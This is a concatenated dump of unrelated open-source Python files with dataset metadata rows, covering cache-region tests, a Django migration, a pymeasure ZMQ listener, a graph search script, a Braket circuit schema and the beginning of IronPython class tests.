reg.get_or_create_multi(["k3", "k2"], creator),
["some value k3 5", "some value k2 4"],
)
eq_(reg.get("k2"), "some value k2 4")
def test_expire_on_get(self):
reg = self._region(config_args={"expiration_time": 0.5})
reg.set("some key", "some value")
eq_(reg.get("some key"), "some value")
time.sleep(1)
is_(reg.get("some key"), NO_VALUE)
def test_ignore_expire_on_get(self):
reg = self._region(config_args={"expiration_time": 0.5})
reg.set("some key", "some value")
eq_(reg.get("some key"), "some value")
time.sleep(1)
eq_(reg.get("some key", ignore_expiration=True), "some value")
def test_override_expire_on_get(self):
reg = self._region(config_args={"expiration_time": 0.5})
reg.set("some key", "some value")
eq_(reg.get("some key"), "some value")
time.sleep(1)
eq_(reg.get("some key", expiration_time=5), "some value")
is_(reg.get("some key"), NO_VALUE)
def test_expire_override(self):
reg = self._region(config_args={"expiration_time": 5})
counter = itertools.count(1)
def creator():
return "some value %d" % next(counter)
eq_(
reg.get_or_create("some key", creator, expiration_time=1),
"some value 1",
)
time.sleep(2)
eq_(reg.get("some key"), "some value 1")
eq_(
reg.get_or_create("some key", creator, expiration_time=1),
"some value 2",
)
eq_(reg.get("some key"), "some value 2")
def test_hard_invalidate_get(self):
reg = self._region()
reg.set("some key", "some value")
time.sleep(0.1)
reg.invalidate()
is_(reg.get("some key"), NO_VALUE)
def test_hard_invalidate_get_or_create(self):
reg = self._region()
counter = itertools.count(1)
def creator():
return "some value %d" % next(counter)
eq_(reg.get_or_create("some key", creator), "some value 1")
time.sleep(0.1)
reg.invalidate()
eq_(reg.get_or_create("some key", creator), "some value 2")
eq_(reg.get_or_create("some key", creator), "some value 2")
reg.invalidate()
eq_(reg.get_or_create("some key", creator), "some value 3")
eq_(reg.get_or_create("some key", creator), "some value 3")
def test_hard_invalidate_get_or_create_multi(self):
reg = self._region()
counter = itertools.count(1)
def creator(*keys):
return ["some value %s %d" % (k, next(counter)) for k in keys]
eq_(
reg.get_or_create_multi(["k1", "k2"], creator),
["some value k1 1", "some value k2 2"],
)
time.sleep(0.1)
reg.invalidate()
eq_(
reg.get_or_create_multi(["k1", "k2"], creator),
["some value k1 3", "some value k2 4"],
)
eq_(
reg.get_or_create_multi(["k1", "k2"], creator),
["some value k1 3", "some value k2 4"],
)
reg.invalidate()
eq_(
reg.get_or_create_multi(["k1", "k2"], creator),
["some value k1 5", "some value k2 6"],
)
eq_(
reg.get_or_create_multi(["k1", "k2"], creator),
["some value k1 5", "some value k2 6"],
)
def test_soft_invalidate_get(self):
reg = self._region(config_args={"expiration_time": 1})
reg.set("some key", "some value")
time.sleep(0.1)
reg.invalidate(hard=False)
is_(reg.get("some key"), NO_VALUE)
def test_soft_invalidate_get_or_create(self):
reg = self._region(config_args={"expiration_time": 1})
counter = itertools.count(1)
def creator():
return "some value %d" % next(counter)
eq_(reg.get_or_create("some key", creator), "some value 1")
time.sleep(0.1)
reg.invalidate(hard=False)
eq_(reg.get_or_create("some key", creator), "some value 2")
def test_soft_invalidate_get_or_create_multi(self):
reg = self._region(config_args={"expiration_time": 5})
values = [1, 2, 3]
def creator(*keys):
v = values.pop(0)
return [v for k in keys]
ret = reg.get_or_create_multi([1, 2], creator)
eq_(ret, [1, 1])
time.sleep(0.1)
reg.invalidate(hard=False)
ret = reg.get_or_create_multi([1, 2], creator)
eq_(ret, [2, 2])
def test_soft_invalidate_requires_expire_time_get(self):
reg = self._region()
reg.invalidate(hard=False)
assert_raises_message(
exception.DogpileCacheException,
"Non-None expiration time required for soft invalidation",
reg.get_or_create,
"some key",
lambda: "x",
)
def test_soft_invalidate_requires_expire_time_get_multi(self):
reg = self._region()
reg.invalidate(hard=False)
assert_raises_message(
exception.DogpileCacheException,
"Non-None expiration time required for soft invalidation",
reg.get_or_create_multi,
["k1", "k2"],
lambda k: "x",
)
def test_should_cache_fn(self):
reg = self._region()
values = [1, 2, 3]
def creator():
return values.pop(0)
should_cache_fn = lambda val: val in (1, 3) # noqa
ret = reg.get_or_create(
"some key", creator, should_cache_fn=should_cache_fn
)
eq_(ret, 1)
eq_(reg.backend._cache["some key"][0], 1)
time.sleep(0.1)
reg.invalidate()
ret = reg.get_or_create(
"some key", creator, should_cache_fn=should_cache_fn
)
eq_(ret, 2)
eq_(reg.backend._cache["some key"][0], 1)
reg.invalidate()
ret = reg.get_or_create(
"some key", creator, should_cache_fn=should_cache_fn
)
eq_(ret, 3)
eq_(reg.backend._cache["some key"][0], 3)
def test_should_cache_fn_multi(self):
reg = self._region()
values = [1, 2, 3]
def creator(*keys):
v = values.pop(0)
return [v for k in keys]
should_cache_fn = lambda val: val in (1, 3) # noqa
ret = reg.get_or_create_multi(
[1, 2], creator, should_cache_fn=should_cache_fn
)
eq_(ret, [1, 1])
eq_(reg.backend._cache[1][0], 1)
time.sleep(0.1)
reg.invalidate()
ret = reg.get_or_create_multi(
[1, 2], creator, should_cache_fn=should_cache_fn
)
eq_(ret, [2, 2])
eq_(reg.backend._cache[1][0], 1)
time.sleep(0.1)
reg.invalidate()
ret = reg.get_or_create_multi(
[1, 2], creator, should_cache_fn=should_cache_fn
)
eq_(ret, [3, 3])
eq_(reg.backend._cache[1][0], 3)
def test_should_set_multiple_values(self):
reg = self._region()
values = {"key1": "value1", "key2": "value2", "key3": "value3"}
reg.set_multi(values)
eq_(values["key1"], reg.get("key1"))
eq_(values["key2"], reg.get("key2"))
eq_(values["key3"], reg.get("key3"))
def test_should_get_multiple_values(self):
reg = self._region()
values = {"key1": "value1", "key2": "value2", "key3": "value3"}
reg.set_multi(values)
reg_values = reg.get_multi(["key1", "key2", "key3"])
eq_(reg_values, ["value1", "value2", "value3"])
def test_should_delete_multiple_values(self):
reg = self._region()
values = {"key1": "value1", "key2": "value2", "key3": "value3"}
reg.set_multi(values)
reg.delete_multi(["key2", "key1000"])
eq_(values["key1"], reg.get("key1"))
eq_(NO_VALUE, reg.get("key2"))
eq_(values["key3"], reg.get("key3"))
class ProxyRegionTest(RegionTest):
""" This is exactly the same as the region test above, but it goes through
a dummy proxy. The purpose of this is to make sure the tests still run
successfully even when there is a proxy """
class MockProxy(ProxyBackend):
@property
def _cache(self):
return self.proxied._cache
def _region(self, init_args={}, config_args={}, backend="mock"):
reg = CacheRegion(**init_args)
config_args["wrap"] = [ProxyRegionTest.MockProxy]
reg.configure(backend, **config_args)
return reg
class CustomInvalidationStrategyTest(RegionTest):
"""Try region tests with custom invalidation strategy.
    This is exactly the same as the region test above, but it uses a custom
    invalidation strategy. The purpose of this is to make sure the tests
    still run successfully when a custom invalidation strategy is in place.
"""
class CustomInvalidationStrategy(RegionInvalidationStrategy):
def __init__(self):
self._soft_invalidated = None
self._hard_invalidated = None
def invalidate(self, hard=None):
if hard:
self._soft_invalidated = None
self._hard_invalidated = time.time()
else:
self._soft_invalidated = time.time()
self._hard_invalidated = None
def is_invalidated(self, timestamp):
return (
self._soft_invalidated and timestamp < self._soft_invalidated
) or (
self._hard_invalidated and timestamp < self._hard_invalidated
)
def was_hard_invalidated(self):
return bool(self._hard_invalidated)
def is_hard_invalidated(self, timestamp):
return (
self._hard_invalidated and timestamp < self._hard_invalidated
)
def was_soft_invalidated(self):
return bool(self._soft_invalidated)
def is_soft_invalidated(self, timestamp):
return (
self._soft_invalidated and timestamp < self._soft_invalidated
)
def _region(self, init_args={}, config_args={}, backend="mock"):
reg = CacheRegion(**init_args)
invalidator = self.CustomInvalidationStrategy()
reg.configure(backend, region_invalidator=invalidator, **config_args)
return reg
class TestProxyValue(object):
def __init__(self, value):
self.value = value
class AsyncCreatorTest(TestCase):
def _fixture(self):
def async_creation_runner(cache, somekey, creator, mutex):
try:
value = creator()
cache.set(somekey, value)
finally:
mutex.release()
return mock.Mock(side_effect=async_creation_runner)
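    # Note (added for clarity; not part of the original test): a production
    # async_creation_runner would typically hand creator() off to a background
    # thread; the fixture above runs it inline so the test stays deterministic.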
def test_get_or_create(self):
acr = self._fixture()
reg = CacheRegion(async_creation_runner=acr)
reg.configure("mock", expiration_time=0.2)
def some_value():
return "some value"
def some_new_value():
return "some new value"
eq_(reg.get_or_create("some key", some_value), "some value")
time.sleep(0.5)
eq_(reg.get_or_create("some key", some_new_value), "some value")
eq_(reg.get_or_create("some key", some_new_value), "some new value")
eq_(
acr.mock_calls,
[
mock.call(
reg, "some key", some_new_value, reg._mutex("some key")
)
],
)
def test_fn_decorator(self):
acr = self._fixture()
reg = CacheRegion(async_creation_runner=acr)
reg.configure("mock", expiration_time=5)
canary = mock.Mock()
@reg.cache_on_arguments()
def go(x, y):
canary(x, y)
return x + y
eq_(go(1, 2), 3)
eq_(go(1, 2), 3)
eq_(canary.mock_calls, [mock.call(1, 2)])
eq_(go(3, 4), 7)
eq_(canary.mock_calls, [mock.call(1, 2), mock.call(3, 4)])
reg.invalidate(hard=False)
eq_(go(1, 2), 3)
eq_(
canary.mock_calls,
[mock.call(1, 2), mock.call(3, 4), mock.call(1, 2)],
)
eq_(
acr.mock_calls,
[
mock.call(
reg,
"tests.cache.test_region:go|1 2",
mock.ANY,
reg._mutex("tests.cache.test_region:go|1 2"),
)
],
)
def test_fn_decorator_with_kw(self):
acr = self._fixture()
reg = CacheRegion(async_creation_runner=acr)
reg.configure("mock", expiration_time=5)
@reg.cache_on_arguments()
def go(x, **kw):
return x
test_value = TestProxyValue("Decorator Test")
self.assertRaises(ValueError, go, x=1, foo=test_value)
@reg.cache_on_arguments()
def go2(x):
return x
# keywords that match positional names can be passed
result = go2(x=test_value)
self.assertTrue(isinstance(result, TestProxyValue))
class ProxyBackendTest(TestCase):
class GetCounterProxy(ProxyBackend):
counter = 0
def get(self, key):
ProxyBackendTest.GetCounterProxy.counter += 1
return self.proxied.get(key)
class SetCounterProxy(ProxyBackend):
counter = 0
def set(self, key, value):
ProxyBackendTest.SetCounterProxy.counter += 1
return self.proxied.set(key, value)
class UsedKeysProxy(ProxyBackend):
""" Keep a counter of hose often we set a particular key"""
def __init__(self, *args, **kwargs):
super(ProxyBackendTest.UsedKeysProxy, self).__init__(
*args, **kwargs
)
self._key_count = defaultdict(lambda: 0)
def setcount(self, key):
return self._key_count[key]
def set(self, key, value):
self._key_count[key] += 1
self.proxied.set(key, value)
class NeverSetProxy(ProxyBackend):
""" A totally contrived example of a Proxy that we pass arguments to.
Never set a key that matches never_set """
def __init__(self, never_set, *args, **kwargs):
super(ProxyBackendTest.NeverSetProxy, self).__init__(
*args, **kwargs
)
self.never_set = never_set
self._key_count = defaultdict(lambda: 0)
def set(self, key, value):
if key != self.never_set:
self.proxied.set(key, value)
class CanModifyCachedValueProxy(ProxyBackend):
def get(self, key):
value = ProxyBackend.get(self, key)
assert isinstance(value, CachedValue)
return value
def set(self, key, value):
assert isinstance(value, CachedValue)
ProxyBackend.set(self, key, value)
def _region(self, init_args={}, config_args={}, backend="mock"):
reg = CacheRegion(**init_args)
reg.configure(backend, **config_args)
return reg
def test_cachedvalue_passed(self):
reg = self._region(
config_args={"wrap": [ProxyBackendTest.CanModifyCachedValueProxy]}
)
reg.set("some key", "some value")
eq_(reg.get("some key"), "some value")
def test_counter_proxies(self):
# count up the gets and sets and make sure they are passed through
# to the backend properly. Test that methods not overridden
# continue to work
reg = self._region(
config_args={
"wrap": [
ProxyBackendTest.GetCounterProxy,
ProxyBackendTest.SetCounterProxy,
]
}
)
ProxyBackendTest.GetCounterProxy.counter = 0
ProxyBackendTest.SetCounterProxy.counter = 0
# set a range of values in the cache
for i in range(10):
reg.set(i, i)
eq_(ProxyBackendTest.GetCounterProxy.counter, 0)
eq_(ProxyBackendTest.SetCounterProxy.counter, 10)
# check that the range of values is still there
for i in range(10):
v = reg.get(i)
eq_(v, i)
eq_(ProxyBackendTest.GetCounterProxy.counter, 10)
eq_(ProxyBackendTest.SetCounterProxy.counter, 10)
# make sure the delete function(not overridden) still
# executes properly
for i in range(10):
reg.delete(i)
v = reg.get(i)
is_(v, NO_VALUE)
def test_instance_proxies(self):
# Test that we can create an instance of a new proxy and
# pass that to make_region instead of the class. The two instances
# should not interfere with each other
proxy_num = ProxyBackendTest.UsedKeysProxy(5)
proxy_abc = ProxyBackendTest.UsedKeysProxy(5)
reg_num = self._region(config_args={"wrap": [proxy_num]})
reg_abc = self._region(config_args={"wrap": [proxy_abc]})
for i in range(10):
reg_num.set(i, True)
reg_abc.set(chr(ord("a") + i), True)
for i in range(5):
reg_num.set(i, True)
reg_abc.set(chr(ord("a") + i), True)
# make sure proxy_num has the right counts per key
eq_(proxy_num.setcount(1), 2)
eq_(proxy_num.setcount(9), 1)
eq_(proxy_num.setcount("a"), 0)
# make sure proxy_abc has the right counts per key
eq_(proxy_abc.setcount("a"), 2)
eq_(proxy_abc.setcount("g"), 1)
eq_(proxy_abc.setcount("9"), 0)
def test_argument_proxies(self):
# Test that we can pass an argument to Proxy on creation
proxy = ProxyBackendTest.NeverSetProxy(5)
reg = self._region(config_args={"wrap": [proxy]})
for i in range(10):
reg.set(i, True)
# make sure 1 was set, but 5 was not
eq_(reg.get(5), NO_VALUE)
eq_(reg.get(1), True)
def test_actual_backend_proxied(self):
# ensure that `reg.actual_backend` is the actual backend
# also ensure that `reg.backend` is a proxied backend
reg = self._region(
config_args={
"wrap": [
ProxyBackendTest.GetCounterProxy,
ProxyBackendTest.SetCounterProxy,
]
}
)
assert isinstance(reg.backend, ProxyBackend)
assert isinstance(reg.actual_backend, CacheBackend)
def test_actual_backend_noproxy(self):
# ensure that `reg.actual_backend` is the actual backend
# also ensure that `reg.backend` is NOT a proxied backend
reg = self._region()
assert isinstance(reg.backend, CacheBackend)
assert isinstance(reg.actual_backend, CacheBackend)
| 32.027316 | 79 | 0.585382 |
e476a0dc5a44a251427d75977a9b0e04fd75f916 | 281 | py | Python | common_migration/tests/migration_files/new/central/migrations/0002_add_ideacopy.py | Wazoku/django-common-migration | 51bbb4d3a5a5c76fc5dcf569da9eb7751b82c9eb | [
"BSD-2-Clause"
] | 1 | 2021-06-03T13:49:50.000Z | 2021-06-03T13:49:50.000Z | common_migration/tests/migration_files/old/central/migrations/0002_add_ideacopy.py | Wazoku/django-common-migration | 51bbb4d3a5a5c76fc5dcf569da9eb7751b82c9eb | [
"BSD-2-Clause"
] | 1 | 2020-11-20T09:17:47.000Z | 2020-11-20T09:17:47.000Z | common_migration/tests/migration_files/old/central/migrations/0002_add_ideacopy.py | Wazoku/django-common-migration | 51bbb4d3a5a5c76fc5dcf569da9eb7751b82c9eb | [
"BSD-2-Clause"
] | 1 | 2020-11-16T16:09:22.000Z | 2020-11-16T16:09:22.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2018-10-29 11:26
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('central', '0001_squashed'),
]
operations = [
]
| 17.5625 | 49 | 0.658363 |
7edf6ca1018b331f9221a2d1c2a92ed9b91f80a8 | 4,526 | py | Python | pymeasure/display/listeners.py | dphaas/pymeasure | 580c33bf5f1e409bb575c46bbd1df682bf27cfe1 | [
"MIT"
] | null | null | null | pymeasure/display/listeners.py | dphaas/pymeasure | 580c33bf5f1e409bb575c46bbd1df682bf27cfe1 | [
"MIT"
] | null | null | null | pymeasure/display/listeners.py | dphaas/pymeasure | 580c33bf5f1e409bb575c46bbd1df682bf27cfe1 | [
"MIT"
] | null | null | null | #
# This file is part of the PyMeasure package.
#
# Copyright (c) 2013-2022 PyMeasure Developers
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import logging
from .Qt import QtCore
from .thread import StoppableQThread
from ..experiment.procedure import Procedure
log = logging.getLogger(__name__)
log.addHandler(logging.NullHandler())
try:
import zmq
import cloudpickle
except ImportError:
zmq = None
cloudpickle = None
log.warning("ZMQ and cloudpickle are required for TCP communication")
class QListener(StoppableQThread):
"""Base class for QThreads that need to listen for messages
on a ZMQ TCP port and can be stopped by a thread- and process-safe
method call
"""
def __init__(self, port, topic='', timeout=0.01):
""" Constructs the Listener object with a subscriber port
over which to listen for messages
:param port: TCP port to listen on
:param topic: Topic to listen on
:param timeout: Timeout in seconds to recheck stop flag
"""
super().__init__()
self.port = port
self.topic = topic
self.context = zmq.Context()
log.debug(f"{self.__class__.__name__} has ZMQ Context: {self.context!r}")
self.subscriber = self.context.socket(zmq.SUB)
self.subscriber.connect('tcp://localhost:%d' % port)
self.subscriber.setsockopt(zmq.SUBSCRIBE, topic.encode())
log.info("%s connected to '%s' topic on tcp://localhost:%d" % (
self.__class__.__name__, topic, port))
self.poller = zmq.Poller()
self.poller.register(self.subscriber, zmq.POLLIN)
self.timeout = timeout
def receive(self, flags=0):
topic, record = self.subscriber.recv_serialized(
deserialize=lambda msg: (msg[0].decode(), cloudpickle.loads(msg[1])),
flags=flags
)
return topic, record
def message_waiting(self):
return self.poller.poll(self.timeout)
def __repr__(self):
return "<{}(port={},topic={},should_stop={})>".format(
self.__class__.__name__, self.port, self.topic, self.should_stop())
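# Illustrative note (added; not from the original file): QListener.receive()
# above unpacks a two-frame multipart message of (utf-8 topic, cloudpickled
# payload), so a matching publisher could emit records like this -- the port
# number and the 'status' topic are made-up example values:
#   pub = zmq.Context().socket(zmq.PUB)
#   pub.bind('tcp://*:5888')
#   pub.send_multipart([b'status', cloudpickle.dumps(record)])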
class Monitor(QtCore.QThread):
""" Monitor listens for status and progress messages
from a Worker through a queue to ensure no messages
    are lost
"""
status = QtCore.QSignal(int)
progress = QtCore.QSignal(float)
log = QtCore.QSignal(object)
worker_running = QtCore.QSignal()
worker_failed = QtCore.QSignal()
worker_finished = QtCore.QSignal() # Distinguished from QThread.finished
worker_abort_returned = QtCore.QSignal()
def __init__(self, queue):
super().__init__()
self.queue = queue
def run(self):
while True:
data = self.queue.get()
if data is None:
break
topic, data = data
if topic == 'status':
self.status.emit(data)
if data == Procedure.RUNNING:
self.worker_running.emit()
elif data == Procedure.FAILED:
self.worker_failed.emit()
elif data == Procedure.FINISHED:
self.worker_finished.emit()
elif data == Procedure.ABORTED:
self.worker_abort_returned.emit()
elif topic == 'progress':
self.progress.emit(data)
elif topic == 'log':
self.log.emit(data)
log.info("Monitor caught stop command")
| 35.359375 | 81 | 0.653999 |
65dce11f353a0d4e0539751544b8f31b381da854 | 2,918 | py | Python | 1_module/D_Graph.py | L4mborg1n1-D14610/Algoritms_and_DataStructure | f61b7434dbc600da02e8ec38648fa84beb160f17 | [
"Xnet",
"X11",
"CECILL-B"
] | null | null | null | 1_module/D_Graph.py | L4mborg1n1-D14610/Algoritms_and_DataStructure | f61b7434dbc600da02e8ec38648fa84beb160f17 | [
"Xnet",
"X11",
"CECILL-B"
] | null | null | null | 1_module/D_Graph.py | L4mborg1n1-D14610/Algoritms_and_DataStructure | f61b7434dbc600da02e8ec38648fa84beb160f17 | [
"Xnet",
"X11",
"CECILL-B"
] | null | null | null | import sys
from collections import deque
class Graph:
def __init__(self):
try:
while True:
line = input().strip('\n')
if line != "":
break
if (line[0:2] == "u ") | (line[0:2] == "d "):
self.__graph_type = line[0]
else:
print("uncorrected graph type")
sys.exit()
self.__start_vertex = line[2:-2]
if (line[-2:] == " b") | (line[-2:] == " d"):
self.__search_type = line[-1]
else:
print("uncorrected search type")
sys.exit()
self.__graph_map = {}
        except EOFError:
            # Without a header line the graph cannot be built, so exit early
            # instead of failing later on unset attributes.
            print("unexpected end of input")
            sys.exit()
def make_graph(self):
while True:
try:
line = input().rstrip('\n')
if line != "":
vertex_list = line.split()
if vertex_list[0] in self.__graph_map:
self.__graph_map[vertex_list[0]].append(vertex_list[1])
else:
self.__graph_map.update({vertex_list[0]: [vertex_list[1]]})
if self.__graph_type == 'u':
if vertex_list[1] in self.__graph_map:
self.__graph_map[vertex_list[1]].append(vertex_list[0])
else:
self.__graph_map.update({vertex_list[1]: [vertex_list[0]]})
except EOFError:
break
for key in self.__graph_map:
self.__graph_map[key].sort()
return
def search(self):
if self.__search_type == 'b':
self.__width_search()
elif self.__search_type == 'd':
self.__deep_search()
def __width_search(self):
visited = set()
vertexes = deque()
vertexes.append(self.__start_vertex)
while vertexes: # not empty
this_vertex = vertexes.popleft()
if this_vertex not in visited:
visited.add(this_vertex)
print(this_vertex)
if this_vertex in self.__graph_map:
for v in self.__graph_map[this_vertex]:
if v not in visited:
vertexes.append(v)
return
def __deep_search(self):
visited = set()
vertexes = deque()
vertexes.append(self.__start_vertex)
while vertexes: # not empty
this_vertex = vertexes.pop()
if this_vertex not in visited:
visited.add(this_vertex)
print(this_vertex)
if this_vertex in self.__graph_map:
for v in reversed(self.__graph_map[this_vertex]):
if v not in visited:
vertexes.append(v)
return
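# Example input (format inferred from the parser above; vertex names are
# illustrative): the header line is "<type> <start> <search>", e.g. "u A b"
# for an undirected graph, start vertex "A", breadth-first search, followed
# by one "src dst" edge pair per line:
#   u A b
#   A B
#   A C
#   B D
# This would print A, B, C, D, one vertex per line, in BFS order.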
graph = Graph()
graph.make_graph()
graph.search()
| 32.422222 | 87 | 0.48218 |
6938a64cce025ab87630f604571680b033c62556 | 6,780 | py | Python | src/braket/ir/jaqcd/program_v1.py | orclassiq/amazon-braket-schemas-python | 895ccb6c15a678975894b7b13fc91febe914719e | [
"Apache-2.0"
] | null | null | null | src/braket/ir/jaqcd/program_v1.py | orclassiq/amazon-braket-schemas-python | 895ccb6c15a678975894b7b13fc91febe914719e | [
"Apache-2.0"
] | null | null | null | src/braket/ir/jaqcd/program_v1.py | orclassiq/amazon-braket-schemas-python | 895ccb6c15a678975894b7b13fc91febe914719e | [
"Apache-2.0"
] | null | null | null | # Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
from typing import Any, List, Optional, Union
from pydantic import BaseModel, Field, validator
from braket.ir.jaqcd.instructions import (
CV,
CY,
CZ,
XX,
XY,
YY,
ZZ,
AmplitudeDamping,
BitFlip,
CCNot,
CNot,
CPhaseShift,
CPhaseShift00,
CPhaseShift01,
CPhaseShift10,
CSwap,
Depolarizing,
EndVerbatimBox,
GeneralizedAmplitudeDamping,
H,
I,
ISwap,
Kraus,
PauliChannel,
PhaseDamping,
PhaseFlip,
PhaseShift,
PSwap,
Rx,
Ry,
Rz,
S,
Si,
StartVerbatimBox,
Swap,
T,
Ti,
TwoQubitDephasing,
TwoQubitDepolarizing,
Unitary,
V,
Vi,
X,
Y,
Z,
)
from braket.ir.jaqcd.results import (
Amplitude,
DensityMatrix,
Expectation,
Probability,
Sample,
StateVector,
Variance,
)
from braket.schema_common import BraketSchemaBase, BraketSchemaHeader
"""
The pydantic validator relies on a constant-time lookup table. A plain Union[] results
in an O(n) lookup cost for arbitrary payloads, which has a negative impact on model parsing times.
"""
_valid_gates = {
CCNot.Type.ccnot: CCNot,
CNot.Type.cnot: CNot,
CPhaseShift.Type.cphaseshift: CPhaseShift,
CPhaseShift00.Type.cphaseshift00: CPhaseShift00,
CPhaseShift01.Type.cphaseshift01: CPhaseShift01,
CPhaseShift10.Type.cphaseshift10: CPhaseShift10,
CSwap.Type.cswap: CSwap,
CV.Type.cv: CV,
CY.Type.cy: CY,
CZ.Type.cz: CZ,
H.Type.h: H,
I.Type.i: I,
ISwap.Type.iswap: ISwap,
PhaseShift.Type.phaseshift: PhaseShift,
PSwap.Type.pswap: PSwap,
Rx.Type.rx: Rx,
Ry.Type.ry: Ry,
Rz.Type.rz: Rz,
S.Type.s: S,
Swap.Type.swap: Swap,
Si.Type.si: Si,
T.Type.t: T,
Ti.Type.ti: Ti,
Unitary.Type.unitary: Unitary,
V.Type.v: V,
Vi.Type.vi: Vi,
X.Type.x: X,
XX.Type.xx: XX,
XY.Type.xy: XY,
Y.Type.y: Y,
YY.Type.yy: YY,
Z.Type.z: Z,
ZZ.Type.zz: ZZ,
}
_valid_noise_channels = {
BitFlip.Type.bit_flip: BitFlip,
PhaseFlip.Type.phase_flip: PhaseFlip,
Depolarizing.Type.depolarizing: Depolarizing,
AmplitudeDamping.Type.amplitude_damping: AmplitudeDamping,
GeneralizedAmplitudeDamping.Type.generalized_amplitude_damping: GeneralizedAmplitudeDamping,
PauliChannel.Type.pauli_channel: PauliChannel,
PhaseDamping.Type.phase_damping: PhaseDamping,
TwoQubitDephasing.Type.two_qubit_dephasing: TwoQubitDephasing,
TwoQubitDepolarizing.Type.two_qubit_depolarizing: TwoQubitDepolarizing,
Kraus.Type.kraus: Kraus,
}
_valid_compiler_directives = {
StartVerbatimBox.Type.start_verbatim_box: StartVerbatimBox,
EndVerbatimBox.Type.end_verbatim_box: EndVerbatimBox,
}
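# Illustrative note (added; not in the original source): the validator below
# keys into these tables with the payload's "type" string, so deserialization
# is a single dict lookup -- e.g. _valid_gates["h"](target=0) builds an H
# instruction, since the enum keys compare equal to their string values.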
Results = Union[Amplitude, Expectation, Probability, Sample, StateVector, DensityMatrix, Variance]
class Program(BraketSchemaBase):
"""
Root object of the JsonAwsQuantumCircuitDescription IR.
Attributes:
braketSchemaHeader (BraketSchemaHeader): Schema header. Users do not need
to set this value. Only default is allowed.
instructions (List[Any]): List of instructions.
basis_rotation_instructions (List[Any]): List of instructions for
rotation to desired measurement bases. Default is None.
results (List[Union[Amplitude, Expectation, Probability, Sample, StateVector,
DensityMatrix, Variance]]):
List of requested results. Default is None.
Examples:
>>> Program(instructions=[H(target=0), Rz(angle=0.15, target=1)])
>>> Program(instructions=[H(target=0), CNot(control=0, target=1)],
... results=[Expectation(targets=[0], observable=['x'])],
... basis_rotation_instructions=[H(target=0)])
Note:
The following instructions are supported:
AmplitudeDamping,
BitFlip,
CCNot,
CNot,
CPhaseShift,
CPhaseShift00,
CPhaseShift01,
CPhaseShift10,
CSwap,
CV,
CY,
CZ,
Depolarizing,
GeneralizedAmplitudeDamping,
        PauliChannel,
H,
I,
ISwap,
Kraus,
PhaseDamping
PhaseFlip,
PhaseShift,
PSwap,
Rx,
Ry,
Rz,
S,
Swap,
Si,
T,
Ti,
TwoQubitDephasing,
TwoQubitDepolarizing,
Unitary,
V,
Vi,
X,
XX,
XY,
Y,
YY,
Z,
ZZ
"""
_PROGRAM_HEADER = BraketSchemaHeader(name="braket.ir.jaqcd.program", version="1")
braketSchemaHeader: BraketSchemaHeader = Field(default=_PROGRAM_HEADER, const=_PROGRAM_HEADER)
instructions: List[Any]
results: Optional[List[Results]]
basis_rotation_instructions: Optional[List[Any]]
@validator("instructions", "basis_rotation_instructions", each_item=True, pre=True)
def validate_instructions(cls, value, field):
"""
Pydantic uses the validation subsystem to create objects. This custom validator has
2 purposes:
1. Implement O(1) deserialization
2. Validate that the input instructions are supported
"""
if isinstance(value, BaseModel):
if (
(value.type not in _valid_gates)
and (value.type not in _valid_noise_channels)
and (value.type not in _valid_compiler_directives)
):
raise ValueError(f"Invalid value.type specified: {value} for field: {field}")
return value
if value is not None and "type" in value:
if value["type"] in _valid_gates:
return _valid_gates[value["type"]](**value)
elif value["type"] in _valid_noise_channels:
return _valid_noise_channels[value["type"]](**value)
elif value["type"] in _valid_compiler_directives:
return _valid_compiler_directives[value["type"]](**value)
else:
raise ValueError(f"Invalid instruction specified: {value} for field: {field}")
else:
raise ValueError(f"Invalid type or value specified: {value} for field: {field}")
| 28.368201 | 98 | 0.642625 |
c7528dcabc0793e7539426aa82e0cc946cc27231 | 70,775 | py | Python | Tests/test_cliclass.py | caoyongxu/ironpython3 | a3e245dd4803b82ffcf6836de522a8ab4ed8e5d5 | [
"Apache-2.0"
] | null | null | null | Tests/test_cliclass.py | caoyongxu/ironpython3 | a3e245dd4803b82ffcf6836de522a8ab4ed8e5d5 | [
"Apache-2.0"
] | null | null | null | Tests/test_cliclass.py | caoyongxu/ironpython3 | a3e245dd4803b82ffcf6836de522a8ab4ed8e5d5 | [
"Apache-2.0"
] | null | null | null | # Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
import sys
import unittest
from iptest import IronPythonTestCase, is_cli, is_debug, is_mono, is_netcoreapp, is_netcoreapp21, is_posix, big, run_test, skipUnlessIronPython
if is_cli:
import clr
import System
@skipUnlessIronPython()
class CliClassTestCase(IronPythonTestCase):
def assertNotWarns(self, warning, callable, *args, **kwds):
import warnings
with warnings.catch_warnings(record=True) as warning_list:
warnings.simplefilter('always')
result = callable(*args, **kwds)
self.assertFalse(any(item.category == warning for item in warning_list))
def setUp(self):
super(CliClassTestCase, self).setUp()
self.load_iron_python_test()
def test_inheritance(self):
import System
class MyList(System.Collections.Generic.List[int]):
def get0(self):
return self[0]
l = MyList()
index = l.Add(22)
